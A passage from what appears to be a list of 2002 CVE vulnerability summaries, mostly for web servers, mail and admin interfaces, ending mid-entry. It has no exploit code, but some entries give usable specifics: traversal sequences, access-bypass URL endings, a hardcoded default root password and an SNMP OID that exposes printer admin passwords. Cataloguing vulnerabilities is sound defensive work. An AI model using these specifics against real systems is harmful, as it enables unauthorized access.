Buffer overflow in Lotus Domino web server before R5.0.10, when logging to DOMLOG.NSF, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP Authenticate header containing certain non-ASCII characters. [CVE-2002-1603] GoAhead Web Server 2.1.7 and earlier allows remote attackers to obtain the source code of ASP files via a URL terminated with a /, \, %2f (encoded /), %20 (encoded space), or %00 (encoded null) character, which returns the ASP source code unparsed. [CVE-2002-1601] The Connectables feature in Adobe PhotoDeluxe 3.1 prepends the Adobe directory to the CLASSPATH environment variable, which allows applets to run with higher privileges and remote attackers to gain privileges via an HTML e-mail message or a web page. [CVE-2002-1597] Cisco SN 5420 Storage Router 1.1(5) and earlier allows remote attackers to cause a denial of service (halt) via a fragmented packet to the Gigabit interface. [CVE-2002-1590] The Web-Based Enterprise Management (WBEM) packages (1) SUNWwbdoc, (2) SUNWwbcou, (3) SUNWwbdev and (4) SUNWmgapp packages, when installed using Solaris 8 Update 1/01 or later, install files with world or group write permissions, which allows local users to gain root privileges or cause a denial of service. [CVE-2002-1585] Unknown vulnerability in Solaris 8 for Intel and Solaris 8 and 9 for SPARC allows remote attackers to cause a denial of service via certain packets that cause some network interfaces to stop responding to TCP traffic. [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script. [CVE-2002-1547] Netscreen running ScreenOS 4.0.0r6 and earlier allows remote attackers to cause a denial of service via a malformed SSH packet to the Secure Command Shell (SCS) management interface, as demonstrated via certain CRC32 exploits, a different vulnerability than CVE-2001-0144. [CVE-2002-1546] BRS WebWeaver Web Server 1.01 allows remote attackers to bypass password protections for files and directories via an HTTP request containing a "/./" sequence. [CVE-2002-1535] Secure Webserver 1.1 in Raptor 6.5 and Symantec Enterprise Firewall 6.5.2 allows remote attackers to identify IP addresses of hosts on the internal network via a CONNECT request, which generates different error messages if the host is present. [CVE-2002-1527] emumail.cgi in EMU Webmail 5.0 allows remote attackers to determine the full pathname for emumail.cgi via a malformed string containing script, which generates a regular expression matching error that includes the pathname in the resulting error message. [CVE-2002-1526] Cross-site scripting (XSS) vulnerability in emumail.cgi for EMU Webmail 5.0 allows remote attackers to inject arbitrary HTML or script via the email address field. [CVE-2002-1521] Web Server 4D (WS4D) 3.6 stores passwords in plaintext in the Ws4d.4DD file, which allows attackers to gain privileges. [CVE-2002-1520] The CLI interface for WatchGuard Firebox Vclass 3.2 and earlier, and RSSA Appliance 3.0.2, does not properly close the SSH connection when a -N option is provided during authentication, which allows remote attackers to access CLI with administrator privileges. [CVE-2002-1519] Format string vulnerability in the CLI interface for WatchGuard Firebox Vclass 3.2 and earlier, and RSSA Appliance 3.0.2, allows remote attackers to cause a denial of service and possibly execute arbitrary code via format string specifiers in the password parameter. [CVE-2002-1504] Directory traversal vulnerability in WebServer 4 Everyone 1.22 allows remote attackers to read arbitrary files via "..\" (dot-dot backslash) sequences in a URL. [CVE-2002-1489] Buffer overflow in PlanetDNS PlanetWeb 1.14 and earlier allows remote attackers to execute arbitrary code via (1) an HTTP GET request with a long URL or (2) a request with a long method name. [CVE-2002-1484] DB4Web server, when configured to use verbose debug messages, allows remote attackers to use DB4Web as a proxy and attempt TCP connections to other systems (port scan) via a request for a URL that specifies the target IP address and port, which produces a connection status in the resulting error message. [CVE-2002-1483] db4web_c and db4web_c.exe programs in DB4Web 3.4 and 3.6 allow remote attackers to read arbitrary files via an HTTP request whose argument is a filename of the form (1) C: (drive letter), (2) //absolute/path (double-slash), or (3) .. (dot-dot). [CVE-2002-1467] Macromedia Flash Plugin before 6,0,47,0 allows remote attackers to bypass the same-domain restriction and read arbitrary files via (1) an HTTP redirect, (2) a "file://" base in a web document, or (3) a relative URL from a web archive (mht file). [CVE-2002-1466] CafeLog b2 Weblog Tool 2.06pre4, with allow_fopen_url enabled, allows remote attackers to execute arbitrary PHP code via the b2inc variable. [CVE-2002-1465] SQL injection vulnerability in CafeLog b2 Weblog Tool allows remote attackers to execute arbitrary SQL code via the tablehosts variable. [CVE-2002-1464] Cross-site scripting (XSS) vulnerability in CafeLog b2 Weblog Tool allows remote attackers to insert arbitrary HTML or script via the GPC variable. [CVE-2002-1461] Web Shop Manager 1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search box. [CVE-2002-1455] Multiple cross-site scripting (XSS) vulnerabilities in OmniHTTPd allow remote attackers to insert script or HTML into web pages via (1) test.php, (2) test.shtml, or (3) redir.exe. [CVE-2002-1454] MyWebServer 1.0.2 allows remote attackers to determine the absolute path of the web document root via a request for a directory that does not exist, which leaks the pathname in an error message. [CVE-2002-1453] Cross-site scripting (XSS) vulnerability in MyWebServer 1.0.2 allows remote attackers to insert script and HTML via a long request followed by the malicious script, which is echoed back to the user in an error message. [CVE-2002-1452] Buffer overflow in the search capability for MyWebServer 1.0.2 allows remote attackers to execute arbitrary code via a long searchTarget parameter. [CVE-2002-1451] Blazix before 1.2.2 allows remote attackers to read source code of JSP scripts or list restricted web directories via an HTTP request that ends in a (1) "+" or (2) "\" (backslash) character. [CVE-2002-1449] eUpload 1.0 stores the password.txt password file in plaintext under the web document root, which allows remote attackers to overwrite arbitrary files by reading password.txt. [CVE-2002-1443] The Google toolbar 1.1.58 and earlier allows remote web sites to monitor a user's input into the toolbar via an "onkeydown" event handler. [CVE-2002-1442] The Google toolbar 1.1.58 and earlier allows remote web sites to perform unauthorized toolbar operations including script execution and file reading in other zones such as "My Computer" by opening a window to tools.google.com or the res: protocol, then using script to modify the window's location to the toolbar's configuration URL, which bypasses the origin verification check. [CVE-2002-1440] The Gateway GS-400 server has a default root password of "0001n" that can not be changed via the administrative interface, which can allow attackers to gain root privileges. [CVE-2002-1438] The web handler for Perl 5.003 on Novell NetWare 5.1 and NetWare 6 allows remote attackers to obtain Perl version information via the -v option. [CVE-2002-1437] Directory traversal vulnerability in the web handler for Perl 5.003 on Novell NetWare 5.1 and NetWare 6 allows remote attackers to read arbitrary files via an HTTP request containing "..%5c" (URL-encoded dot-dot backslash) sequences. [CVE-2002-1436] The web handler for Perl 5.003 on Novell NetWare 5.1 and NetWare 6 allows remote attackers to execute arbitrary Perl code via an HTTP POST request. [CVE-2002-1434] Multiple cross-site scripting (XSS) vulnerabilities in the Web mail module of Kerio MailServer 5.0 allow remote attackers to execute HTML script as other users via certain URLs. [CVE-2002-1432] MidiCart stores the midicart.mdb database file under the Web document root, which allows remote attackers to steal sensitive information by directly requesting the database. [CVE-2002-1416] The POP3 service for WebEasyMail 3.4.2.2 and earlier generates diffferent error messages for valid and invalid usernames during authentication, which makes it easier for remote attackers to conduct brute force attacks. [CVE-2002-1415] Format string vulnerability in SMTP service for WebEasyMail 3.4.2.2 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via format strings in SMTP requests. [CVE-2002-1390] The daemon for GeneWeb before 4.09 does not properly handle requested paths, which allows remote attackers to read arbitrary files via a crafted URL. [CVE-2002-1388] Cross-site scripting (XSS) vulnerability in MHonArc before 2.5.14 allows remote attackers to inject arbitrary HTML into web archive pages via HTML mail messages. [CVE-2002-1385] openwebmail_init in Open WebMail 1.81 and earlier allows local users attackers to execute arbitrary code via .. (dot dot) sequences in a login name, such as the name provided in the sessionid parameter for openwebmail-abook.pl, which is used to find a configuration file that specifies additional code to be executed. [CVE-2002-1383] Multiple integer overflows in Common Unix Printing System (CUPS) 1.1.14 through 1.1.17 allow remote attackers to execute arbitrary code via (1) the CUPSd HTTP interface, as demonstrated by vanilla-coke, and (2) the image handling code in CUPS filters, as demonstrated by mksun. [CVE-2002-1380] Linux kernel 2.2.x allows local users to cause a denial of service (crash) by using the mmap() function with a PROT_READ parameter to access non-readable memory pages through the /proc/pid/mem interface. [CVE-2002-1353] LocalWEB2000 HTTP server 2.1.0 stores passwords in plain text under the web document root in users.lst, which allows remote attackers to obtain the passwords via a direct request to users.lst. [CVE-2002-1340] The "ConnectionFile" property in the DataSourceControl component in Office Web Components (OWC) 10 allows remote attackers to determine the existence of local files by detecting an exception. [CVE-2002-1339] The "XMLURL" property in the Spreadsheet component of Office Web Components (OWC) 10 follows redirections, which allows remote attackers to determine the existence of local files based on exceptions, or to read WorkSheet XML files. [CVE-2002-1338] The Load method in the Chart component of Office Web Components (OWC) 9 and 10 generates an exception when a specified file does not exist, which allows remote attackers to determine the existence of local files. [CVE-2002-1335] Cross-site scripting (XSS) vulnerability in w3m 0.3.2 does not escape an HTML tag in a frame, which allows remote attackers to insert arbitrary web script or HTML and access files or cookies. [CVE-2002-1334] Cross-site scripting (XSS) vulnerability in BizDesign ImageFolio 3.01 and earlier allows remote attackers to execute arbitrary web script as other users via (1) the direct parameter in imageFolio.cgi, or (2) nph-build.cgi. [CVE-2002-1316] importInfo in the Admin Server for iPlanet WebServer 4.x, up to SP11, allows the web administrator to execute arbitrary commands via shell metacharacters in the dir parameter, and possibly allows remote attackers to exploit this vulnerability via a separate XSS issue (CVE-2002-1315). [CVE-2002-1315] Cross-site scripting (XSS) vulnerability in the Admin Server for iPlanet WebServer 4.x, up to SP11, allows remote attackers to execute web script or HTML as the iPlanet administrator by injecting the desired script into error logs, and possibly escalating privileges by using the XSS vulnerability in conjunction with another issue (CVE-2002-1316). [CVE-2002-1311] Courier sqwebmail before 0.40.0 does not quickly drop privileges after startup in certain cases, which could allow local users to read arbitrary files. [CVE-2002-1267] Mac OS X 10.2.2 allows remote attackers to cause a denial of service by accessing the CUPS Printing Web Administration utility, aka "CUPS Printing Web Administration is Remotely Accessible." [CVE-2002-1264] Buffer overflow in Oracle iSQLPlus web application of the Oracle 9 database server allows remote attackers to execute arbitrary code via a long USERID parameter in the isqlplus URL. [CVE-2002-1257] Microsoft Virtual Machine (VM) up to and including build 5.0.3805 allows remote attackers to execute arbitrary code by including a Java applet that invokes COM (Component Object Model) objects in a web site or an HTML mail. [CVE-2002-1255] Microsoft Outlook 2002 allows remote attackers to cause a denial of service (repeated failure) via an email message with a certain invalid header field that is accessed using POP3, IMAP, or WebDAV, aka "E-mail Header Processing Flaw Could Cause Outlook 2002 to Fail." [CVE-2002-1248] Northern Solutions Xeneo Web Server 2.1.0.0, 2.0.759.6, and other versions before 2.1.5 allows remote attackers to cause a denial of service (crash) via a GET request for a "%" URI. [CVE-2002-1238] Peter Sandvik's Simple Web Server 0.5.1 and earlier allows remote attackers to bypass access restrictions for files via an HTTP request with a sequence of multiple / (slash) characters such as http://www.example.com///file/. [CVE-2002-1236] The remote management web server for Linksys BEFSR41 EtherFast Cable/DSL Router before firmware 1.42.7 allows remote attackers to cause a denial of service (crash) via an HTTP request to Gozila.cgi without any arguments. [CVE-2002-1217] Cross-Frame scripting vulnerability in the WebBrowser control as used in Internet Explorer 5.5 and 6.0 allows remote attackers to execute arbitrary code, read arbitrary files, or conduct other unauthorized activities via script that accesses the Document property, which bypasses <frame> and <iframe> domain restrictions. [CVE-2002-1213] Directory traversal vulnerability in RadioBird Software WebServer 4 Everyone 1.23 and 1.27, and other versions before 1.30, allows remote attackers to read arbitrary files via an HTTP request with ".." (dot-dot) sequences containing URL-encoded forward slash ("%2F") characters. [CVE-2002-1212] Buffer overflow in RadioBird Software WebServer 4 Everyone 1.23 and 1.27, and other versions before 1.30, allows remote attackers to cause a denial of service (crash) via a long HTTP GET request. [CVE-2002-1187] Cross-site scripting vulnerability (XSS) in Internet Explorer 5.01 through 6.0 allows remote attackers to read and execute files on the local system via web pages using the <frame> or <iframe> element and javascript, aka "Frames Cross Site Scripting," as demonstrated using the PrivacyPolicy.dlg resource. [CVE-2002-1182] IIS 5.0 and 5.1 allows remote attackers to cause a denial of service (crash) via malformed WebDAV requests that cause a large amount of memory to be assigned. [CVE-2002-1181] Multiple cross-site scripting (XSS) vulnerabilities in the administrative web pages for Microsoft Internet Information Server (IIS) 4.0 through 5.1 allow remote attackers to execute HTML script as other users through (1) a certain ASP file in the IISHELP virtual directory, or (2) possibly other unknown attack vectors. [CVE-2002-1169] IBM Web Traffic Express Caching Proxy Server 3.6 and 4.x before 4.0.1.26 allows remote attackers to cause a denial of service (crash) via an HTTP request to helpout.exe with a missing HTTP version number, which causes ibmproxy.exe to crash. [CVE-2002-1168] Cross-site scripting (XSS) vulnerability in IBM Web Traffic Express Caching Proxy Server 3.6 and 4.x before 4.0.1.26 allows remote attackers to execute script as other users via an HTTP request that contains an Location: header with a "%0a%0d" (CRLF) sequence, which echoes the Location as an HTTP header in the server response. [CVE-2002-1167] Cross-site scripting (XSS) vulnerability in IBM Web Traffic Express Caching Proxy Server 3.6 and 4.x before 4.0.1.26 allows remote attackers to execute script as other users via an HTTP GET request. [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840. [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled. [CVE-2002-1154] anlgform.pl in Analog before 5.23 does not restrict access to the PROGRESSFREQ progress update command, which allows remote attackers to cause a denial of service (disk consumption) by using the command to report updates more frequently and fill the web server error log. [CVE-2002-1153] IBM Websphere 4.0.3 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via an HTTP request with long HTTP headers, such as "Host". [CVE-2002-1149] The installation procedure for Invision Board suggests that users install the phpinfo.php program under the web root, which leaks sensitive information such as absolute pathnames, OS information, and PHP settings. [CVE-2002-1147] The HTTP administration interface for HP Procurve 4000M Switch firmware before C.09.16, with stacking features and remote administration enabled, does not authenticate requests to reset the device, which allows remote attackers to cause a denial of service via a direct request to the device_reset CGI program. [CVE-2002-1145] The xp_runwebtask stored procedure in the Web Tasks component of Microsoft SQL Server 7.0 and 2000, Microsoft Data Engine (MSDE) 1.0, and Microsoft Desktop Engine (MSDE) 2000 can be executed by PUBLIC, which allows an attacker to gain privileges by updating a webtask that is owned by the database owner through the msdb.dbo.mswebtasks table, which does not have strong permissions. [CVE-2002-1135] modsecurity.php 1.10 and earlier, in phpWebSite 0.8.2 and earlier, allows remote attackers to execute arbitrary PHP source code via an inc_prefix parameter that points to the malicious code. [CVE-2002-1134] Unknown vulnerability in Compaq WEBES Service Tools 2.0 through WEBES 4.0 (Service Pack 5) allows local users to read privileged files. [CVE-2002-1133] Encoded directory traversal vulnerability in Dino's web server 2.1 allows remote attackers to read arbitrary files via ".." (dot dot) sequences with URL-encoded (1) "/" (%2f") or (2) "\" (%5c) characters. [CVE-2002-1131] Cross-site scripting vulnerabilities in SquirrelMail 1.2.7 and earlier allows remote attackers to execute script as other web users via (1) addressbook.php, (2) options.php, (3) search.php, or (4) help.php. [CVE-2002-1126] Mozilla 1.1 and earlier, and Mozilla-based browsers such as Netscape and Galeon, set the document referrer too quickly in certain situations when a new page is being loaded, which allows web pages to determine the next page that is being visited, including manually entered URLs, using the onunload handler. [CVE-2002-1122] Buffer overflow in the parsing mechanism for ISS Internet Scanner 6.2.1, when using the license banner HTTP check, allows remote attackers to execute arbitrary code via a long web server response. [CVE-2002-1120] Buffer overflow in Savant Web Server 3.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request. [CVE-2002-1100] Cisco VPN 3000 Concentrator 2.2.x, and 3.x before 3.5.3, allows remote attackers to cause a denial of service (crash) via a long (1) username or (2) password to the HTML login interface. [CVE-2002-1093] HTML interface for Cisco VPN 3000 Concentrator 2.x.x and 3.x.x before 3.0.3(B) allows remote attackers to cause a denial of service (CPU consumption) via a long URL request. [CVE-2002-1081] The Administration console for Abyss Web Server 1.0.3 allows remote attackers to read files without providing login credentials via an HTTP request to a target file that ends in a "+" character. [CVE-2002-1080] The Administration console for Abyss Web Server 1.0.3 before Patch 2 allows remote attackers to gain privileges and modify server configuration via direct requests to CHL files such as (1) srvstatus.chl, (2) consport.chl, (3) general.chl, (4) srvparam.chl, and (5) advanced.chl. [CVE-2002-1079] Directory traversal vulnerability in Abyss Web Server 1.0.3 allows remote attackers to read arbitrary files via ..\ (dot-dot backslash) sequences in an HTTP GET request. [CVE-2002-1078] Abyss Web Server 1.0.3 allows remote attackers to list directory contents via an HTTP GET request that ends in a large number of / (slash) characters. [CVE-2002-1077] IPSwitch IMail Web Calendaring service (iwebcal) allows remote attackers to cause a denial of service (crash) via an HTTP POST request without a Content-Length field. [CVE-2002-1076] Buffer overflow in the Web Messaging daemon for Ipswitch IMail before 7.12 allows remote attackers to execute arbitrary code via a long HTTP GET request for HTTP/1.0. [CVE-2002-1069] The remote administration capability for the D-Link DI-804 router 4.68 allows remote attackers to bypass authentication and release DHCP addresses or obtain sensitive information via a direct web request to the pages (1) release.htm, (2) Device Status, or (3) Device Information. [CVE-2002-1068] The web server for D-Link DP-300 print server allows remote attackers to cause a denial of service (hang) via a large HTTP POST request. [CVE-2002-1060] Cross-site scripting (XSS) vulnerability in Blue Coat Systems (formerly CacheFlow) CacheOS on Client Accelerator 4.1.06, Security Gateway 2.1.02, and Server Accelerator 4.1.06 allows remote attackers to inject arbitrary web script or HTML via a URL to a nonexistent hostname that includes the HTML, which is inserted into the resulting error page. [CVE-2002-1055] Buffer overflow in administrative web server for Brother NC-3100h printer allows remote attackers to cause a denial of service via a long password. [CVE-2002-1048] HP JetDirect printers allow remote attackers to obtain the administrative password for the (1) web and (2) telnet services via an SNMP request to the variable (.iso.3.6.1.4.1.11.2.3.9.4.2.1.3.9.1.1.0. [CVE-2002-1042] Directory traversal vulnerability in search engine for iPlanet web server 6.0 SP2 and 4.1 SP9, and Netscape Enterprise Server 3.6, when running on Windows platforms, allows remote attackers to read arbitrary files via ..\ (dot-dot backslash) sequences in the NS-query-pat parameter. [CVE-2002-1040] Unknown vulnerability in the WebSecure (DFSWeb) configuration utilities in AIX 4.x, possibly related to relative pathnames. [CVE-2002-1037] Cross-site scripting vulnerability in Double Choco Latte (DCL) before 20020706 allows remote attackers to inject arbitrary HTML, including script, into web pages via the (1) Ticket# Find, (2) Priorities, (3) Severities, (4) Projects, (5) WO# Find, (6) Departments and (7) Users features. [CVE-2002-1036] Cross-site scripting vulnerability in search.pl for Fluid Dynamics Search Engine (FDSE) before 2.0.0.0055 allows remote attackers to execute web script via the (1) Rank or (2) Match parameters. [CVE-2002-1032] Buffer overflow in KeyFocus (KF) web server 1.0.5 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via a malformed HTTP header. [CVE-2002-1031] KeyFocus (KF) web server 1.0.2 allows remote attackers to list directories and read restricted files via an HTTP request containing a %00 (null) character. [CVE-2002-1030] Race condition in Performance Pack in BEA WebLogic Server and Express 5.1.x, 6.0.x, 6.1.x and 7.0 allows remote attackers to cause a denial of service (crash) via a flood of data and connections. [CVE-2002-1027] Cross-site scripting vulnerability in the default HTTP 500 error script (500error.jsp) for Macromedia Sitespring 1.2.0 (277.1) allows remote attackers to execute arbitrary web script via a link to 500error.jsp with the script in 1the et parameter. [CVE-2002-1015] RealJukebox 2 1.0.2.340 and 1.0.2.379, and RealOne Player Gold 6.0.10.505, allows remote attackers to execute arbitrary script in the Local computer zone by inserting the script into the skin.ini file of an RJS archive, then referencing skin.ini from a web page after it has been extracted, which is parsed as HTML by Internet Explorer or other Microsoft-based web readers. [CVE-2002-1012] Buffer overflow in web server for Tivoli Management Framework (TMF) ManagedNode 3.6.x through 3.7.1 allows remote attackers to cause a denial of service or execute arbitrary code via a long HTTP GET request. [CVE-2002-1011] Buffer overflow in web server for Tivoli Management Framework (TMF) Endpoint 3.6.x through 3.7.1, before Fixpack 2, allows remote attackers to cause a denial of service or execute arbitrary code via a long HTTP GET request. [CVE-2002-1010] Lotus Domino R4 allows remote attackers to bypass access restrictions for files in the web root via an HTTP request appended with a "?" character, which is treated as a wildcard character and bypasses the web handlers. [CVE-2002-1009] Cross-site scripting vulnerability in PowerBASIC pbcgi.cgi, as included in Lil' HTTP web server, allows remote attackers to execute arbitrary web script in other web browsers via the (1) "Name" or (2) "E-mail" parameters. [CVE-2002-1008] Cross-site scripting vulnerability in PowerBASIC urlcount.cgi, as included in Lil' HTTP web server, allows remote attackers to execute arbitrary web script in other web browsers via a request to urlcount.cgi that contains the script, which is not filtered when the REPORT capability prints the original request. [CVE-2002-1007] Cross-site scripting vulnerabilities in Blackboard 5 allow remote attackers to execute arbitrary web script via (1) the course_id parameter in a link to login.pl, (2) the CTID parameter in ProcessInfo.cgi, or (3) the Message parameter in index.cgi. [CVE-2002-1006] Cross-site scripting (XSS) vulnerability in BBC Education Text to Speech Internet Enhancer (Betsie) 1.5.11 and earlier allows remote attackers to execute arbitrary web script via parserl.pl. [CVE-2002-1005] ArGoSoft Mail Server 1.8.1.7 and earlier allows a webmail user to cause a denial of service (CPU consumption) by forwarding the email to the user while autoresponse is enabled, which creates an inifinite loop. [CVE-2002-1004] Directory traversal vulnerability in webmail feature of ArGoSoft Mail Server Plus or Pro 1.8.1.5 and earlier allows remote attackers to read arbitrary files via .. (dot dot) sequences in a URL. [CVE-2002-1003] Buffer overflow in MyWebServer 1.02 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request. [CVE-2002-0996] Multiple buffer overflows in Novell NetMail (NIMS) 3.0.3 before 3.0.3C allows remote attackers to cause a denial of service and possibly execute arbitrary code via (1) WebAdmin or (2) ModWeb. [CVE-2002-0990] The web proxy component in Symantec Enterprise Firewall (SEF) 6.5.2 through 7.0, Raptor Firewall 6.5 and 6.5.3, VelociRaptor, and Symantec Gateway Security allow remote attackers to cause a denial of service (connection resource exhaustion) via multiple connection requests to domains whose DNS server is unresponsive or does not exist, which generates a long timeout. [CVE-2002-0980] The Web Folder component for Internet Explorer 5.5 and 6.0 writes an error message to a known location in the temporary folder, which allows remote attackers to execute arbitrary code by injecting it into the error message, then referring to the error message file via a mhtml: URL. [CVE-2002-0976] Internet Explorer 4.0 and later allows remote attackers to read arbitrary files via a web page that accesses a legacy XML Datasource applet (com.ms.xml.dso.XMLDSO.class) and modifies the base URL to point to the local system, which is trusted by the applet. [CVE-2002-0975] Buffer overflow in Microsoft DirectX Files Viewer ActiveX control (xweb.ocx) 2.0.6.15 and earlier allows remote attackers to execute arbitrary via a long File parameter. [CVE-2002-0966] Buffer overflow in 4D web server 6.7.3 allow remote attackers to cause a denial of service and possibly execute arbitrary code via a long HTTP request. [CVE-2002-0955] Cross-site scripting vulnerability in YaBB.cgi for Yet Another Bulletin Board (YaBB) 1 Gold SP1 and earlier allows remote attackers to execute arbitrary script as other web site visitors via script in the num parameter, which is not filtered in the resulting error message. [CVE-2002-0952] Cisco ONS15454 optical transport platform running ONS 3.1.0 to 3.2.0 allows remote attackers to cause a denial of service (reset) by sending IP packets with non-zero Type of Service (TOS) bits to the Timing Control Card (TCC) LAN interface. [CVE-2002-0948] Scripts For Educators MakeBook 2.2 CGI program allows remote attackers to execute script as other visitors, or execute server-side includes (SSI) as the web server, via the (1) Name or (2) Email parameters, which are not properly filtered. [CVE-2002-0943] MetaCart2.sql stores the user database under the web document root without access controls, which allows remote attackers to obtain sensitive information such as passwords and credit card numbers via a direct request for metacart.mdb. [CVE-2002-0938] Cross-site scripting vulnerability in CiscoSecure ACS 3.0 allows remote attackers to execute arbitrary script or HTML as other web users via the action argument in a link to setup.exe. [CVE-2002-0937] The Java Server Pages (JSP) engine in JRun allows web page owners to cause a denial of service (engine crash) on the web server via a JSP page that calls WPrinterJob().pageSetup(null,null). [CVE-2002-0936] The Java Server Pages (JSP) engine in Tomcat allows web page owners to cause a denial of service (engine crash) on the web server via a JSP page that calls WPrinterJob().pageSetup(null,null). [CVE-2002-0926] Directory traversal vulnerability in Wolfram Research webMathematica 1.0.0 and 1.0.0.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the MSPStoreID parameter. [CVE-2002-0917] CGIScript.net csPassword.cgi stores .htpasswd files under the web document root, which could allow remote authenticated users to download the file and crack the passwords of other users. [CVE-2002-0908] Directory traversal vulnerability in the web server for Cisco IDS Device Manager before 3.1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the HTTPS request. [CVE-2002-0900] Buffer overflow in pks PGP public key web server before 0.9.5 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long search argument to the lookup capability. [CVE-2002-0899] Falcon web server 2.0.0.1021 and earlier allows remote attackers to bypass access restrictions for protected files via a URL whose directory portion ends in a . (dot). [CVE-2002-0898] Opera 6.0.1 and 6.0.2 allows a remote web site to upload arbitrary files from the client system, without prompting the client, via an input type=file tag whose value contains a newline. [CVE-2002-0897] LocalWEB2000 2.1.0 web server allows remote attackers to bypass access restrictions for restricted files via a URL that contains the "/./" directory. [CVE-2002-0892] The default configuration of NewAtlanta ServletExec ISAPI 4.1 allows remote attackers to determine the path of the web root via a direct request to com.newatlanta.servletexec.JSP10Servlet without a filename, which leaks the pathname in an error message. [CVE-2002-0882] The web server for Cisco IP Phone (VoIP) models 7910, 7940, and 7960 allows remote attackers to cause a denial of service (reset) and possibly read sensitive memory via a large integer value in (1) the stream ID of the StreamingStatistics script, or (2) the port ID of the PortInformation script. [CVE-2002-0876] Web server for Shambala 4.5 allows remote attackers to cause a denial of service (crash) via a malformed HTTP request. [CVE-2002-0861] Microsoft Office Web Components (OWC) 2000 and 2002 allows remote attackers to bypass the "Allow paste operations via script" setting, even when it is disabled, via the (1) Copy method of the Cell object or (2) the Paste method of the Range object. [CVE-2002-0860] The LoadText method in the spreadsheet component in Microsoft Office Web Components (OWC) 2000 and 2002 allows remote attackers to read arbitrary files through Internet Explorer via a URL that redirects to the target file. [CVE-2002-0845] Buffer overflow in Sun ONE / iPlanet Web Server 4.1 and 6.0 allows remote attackers to execute arbitrary code via an HTTP request using chunked transfer encoding. [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response. [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157. [CVE-2002-0837] wordtrans 1.1pre8 and earlier in the wordtrans-web package allows remote attackers to (1) execute arbitrary code or (2) conduct cross-site scripting attacks via certain parameters (possibly "dict") to the wordtrans.php script. [CVE-2002-0818] wwwoffled in World Wide Web Offline Explorer (WWWOFFLE) allows remote attackers to cause a denial of service and possibly execute arbitrary code via a negative Content-Length value. [CVE-2002-0815] The Javascript "Same Origin Policy" (SOP), as implemented in (1) Netscape, (2) Mozilla, and (3) Internet Explorer, allows a remote web server to access HTTP and SOAP/XML content from restricted sites by mapping the malicious server's parent DNS domain name to the restricted site, loading a page from the restricted site into one frame, and passing the information to the attacker-controlled frame, which is allowed because the document.domain of the two frames matches on the parent domain. [CVE-2002-0787] Cross-site scripting vulnerabilities in iCon administrative web server for Critical Path inJoin Directory Server 4.0 allow remote attackers to execute script as the administrator via administrator URLs with modified (1) LOCID or (2) OC parameters. [CVE-2002-0786] iCon administrative web server for Critical Path inJoin Directory Server 4.0 allows authenticated inJoin administrators to read arbitrary files by specifying the target file in the LOG parameter. [CVE-2002-0784] Directory traversal vulnerability in Lysias Lidik web server 0.7b allows remote attackers to list directories via an HTTP request with a ... (modified dot dot). [CVE-2002-0782] Novell BorderManager 3.5 with PAT (Port-Address Translate) enabled allows remote attackers to cause a denial of service by filling the connection table with a large number of connection requests to hosts that do not have a specific route, which may be forwarded to the public interface. [CVE-2002-0774] Hosting Controller creates a default user AdvWebadmin with a default password, which could allow remote attackers to gain privileges if the password is not changed. [CVE-2002-0763] Vulnerability in administration server for HP VirtualVault 4.5 on HP-UX 11.04 allows remote web servers or privileged external processes to bypass access restrictions and establish connections to the server. [CVE-2002-0757] (1) Webmin 0.96 and (2) Usermin 0.90 with password timeouts enabled allow local and possibly remote attackers to bypass authentication and gain privileges via certain control characters in the authentication information, which can force Webmin or Usermin to accept arbitrary username/session ID combinations. [CVE-2002-0756] Cross-site scripting vulnerability in the authentication page for (1) Webmin 0.96 and (2) Usermin 0.90 allows remote attackers to insert script into an error page and possibly steal cookies. [CVE-2002-0753] Buffer overflow in Talentsoft Web+ 5.0 allows remote attackers to execute arbitrary code via an HTTP request with a long cookie. [CVE-2002-0752] CGIscript.net csMailto.cgi program exports feedback to a file that is accessible from the web document root, which could allow remote attackers to obtain sensitive information by directly accessing the file. [CVE-2002-0748] LabVIEW Web Server 5.1.1 through 6.1 allows remote attackers to cause a denial of service (crash) via an HTTP GET request that ends in two newline characters, instead of the expected carriage return/newline combinations. [CVE-2002-0738] MHonArc 2.5.2 and earlier does not properly filter Javascript from archived e-mail messages, which could allow remote attackers to execute script in web clients by (1) splitting the SCRIPT tag into smaller pieces, (2) including the script in a SRC argument to an IMG tag, or (3) using "&={script}" syntax. [CVE-2002-0737] Sambar web server before 5.2 beta 1 allows remote attackers to obtain source code of server-side scripts, or cause a denial of service (resource exhaustion) via DOS devices, using a URL that ends with a space and a null character. [CVE-2002-0727] The Host function in Microsoft Office Web Components (OWC) 2000 and 2002 is exposed in components that are marked as safe for scripting, which allows remote attackers to execute arbitrary commands via the setTimeout method. [CVE-2002-0718] Web authoring command in Microsoft Content Management Server (MCMS) 2001 allows attackers to authenticate and upload executable content, by modifying the upload location, aka "Program Execution via MCMS Authoring Function." [CVE-2002-0715] Vulnerability in Squid before 2.4.STABLE6 related to proxy authentication credentials may allow remote web sites to obtain the user's proxy login and password. [CVE-2002-0709] SQL injection vulnerabilities in the Web Reports Server for SurfControl SuperScout WebFilter allow remote attackers to execute arbitrary SQL queries via the RunReport option to 